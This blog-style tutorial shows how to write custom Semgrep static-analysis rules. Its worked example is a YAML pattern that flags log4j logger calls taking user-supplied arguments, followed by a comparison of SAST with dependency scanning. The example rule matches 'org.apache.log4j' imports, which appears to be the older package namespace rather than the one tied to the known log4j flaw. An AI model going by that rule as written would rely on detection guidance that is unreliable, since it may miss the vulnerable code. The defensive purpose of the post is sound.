Building Custom Detection Signatures (SAST)

Most commercial SAST tools ship thousands of detection signatures, but they can't be customized. You get their rules or nothing. This creates two problems: false positives from generic patterns that don't match your application's architecture, and false negatives from vulnerabilities that don't fit any pre-built signature.

Off-the-shelf tooling handles the well-known patterns like basic XSS and straightforward SQLi. But look at the high-impact bug bounty reports disclosed in recent years. Almost none of them would be caught by a generic scanner. They require context about the specific application: how data flows through it, which libraries are in use, and how they're configured. Although a ridiculously easy to spot vulnerability surfaces occasionally, it's the exception.

This is where custom detection signatures come in. If you can write rules tailored to your application's patterns, you can catch the things generic tools miss. This post covers Semgrep, an open-source SAST tool with a rules engine designed for exactly this.

Semgrep

Semgrep logo

"If a developer has to convince their manager to spend a few million dollars on advanced security tools each time they change jobs, the future is bleak." - Semgrep philosophy

Semgrep is a semantic code analysis tool originally built at Facebook in 2009 and now maintained by r2c. The name stands for "Semantic Grep." It pattern-matches against code structure, not just text. Where grep finds string literals, Semgrep understands what code is doing: matching function calls, tracking variable assignments, and following data flow across statements.

What makes it useful for custom detection:

Runs locally. Source code never leaves your machine. Unlike SaaS-based SAST tools that require uploading your codebase, Semgrep runs entirely in your environment. This also makes it fast enough to run in the IDE, in git commit hooks, or in CI/CD without slowing down the build.
Simple rule syntax. Rules are written in YAML using a pattern language that reads like the code it matches. You don't need to learn a DSL or write an AST visitor.
20+ languages supported, with pre-built rulesets for frameworks like Django, Express, and Spring.

Example: Detecting Exploitable log4j Usage

The Semgrep documentation covers the basics well and includes an interactive playground. Rather than walking through simple examples, here's a rule that targets something more interesting: detecting exploitable log4j usage, not just the presence of the library.

The embedded playground below has the rule pre-configured. Hit Run to test it against the sample code:

The rule uses three Semgrep operators:

- pattern: $LOGGER.$METHOD(...);
- pattern-inside: |
   import org.apache.log4j.$PKG;
   ...
   $LOGGER = $PKG. ... ;
    ...
- pattern-not: $LOGGER.$METHOD("...");

Metavariables ($VAR) are placeholders that match any expression, like capture groups in regex. $LOGGER.$METHOD(...) matches any method call on any logger object. import org.apache.log4j.$PKG matches any import from the log4j package.

Ellipses (...) match zero or more arguments, statements, or expressions. $LOGGER.$METHOD(...) matches a logger method call with any number of arguments. In pattern-inside, the ... between statements means "any number of lines between these."

pattern-not excludes matches. $LOGGER.$METHOD("...") with the ellipsis inside quotes matches calls where the argument is a hardcoded string. Since log4j is only exploitable when user input is logged, excluding hardcoded strings eliminates false positives.

So the rule matches this line:

log.info("Request User Agent:" + userAgent);

userAgent is concatenated into the log message, making it a tainted argument. A line like log.info("Application started"); would not match because the argument is a hardcoded string.

SAST vs. SCA: Finding Exploitable Usage

This example highlights a distinction worth thinking about. Most organizations would detect log4j through SCA (Software Composition Analysis), a dependency scanner that flags the vulnerable library version. SCA tells you log4j exists in your dependency tree. It doesn't tell you whether the logger is actually called anywhere in your code, or whether user input reaches it.

The Semgrep rule goes a layer deeper. It finds the specific code paths where a log4j logger is called with a non-hardcoded argument, which is what makes the vulnerability exploitable. An application that imports log4j but only logs static strings isn't exploitable through this vector, and a SAST rule can distinguish between the two.

Static analysis isn't perfect. This rule has limitations in both directions: it will flag a variable that happens to not contain user input (false positive), and it will miss a code path where user input reaches the logger through a wrapper function that doesn't match the pattern (false negative). But it's a meaningful step beyond "is the library present?"

Building Rules from Your Own Findings

The most effective way to build custom Semgrep rules is to work backwards from real vulnerabilities. When you find a bug through manual testing or a pentest that your existing SAST tools missed, write a rule that catches the pattern. This turns a one-time finding into ongoing detection.

Semgrep's rule syntax is simple enough that writing a rule takes minutes, not hours. You don't need to be a compiler engineer or write AST visitors. If you can read the code you're trying to detect, you can write the rule.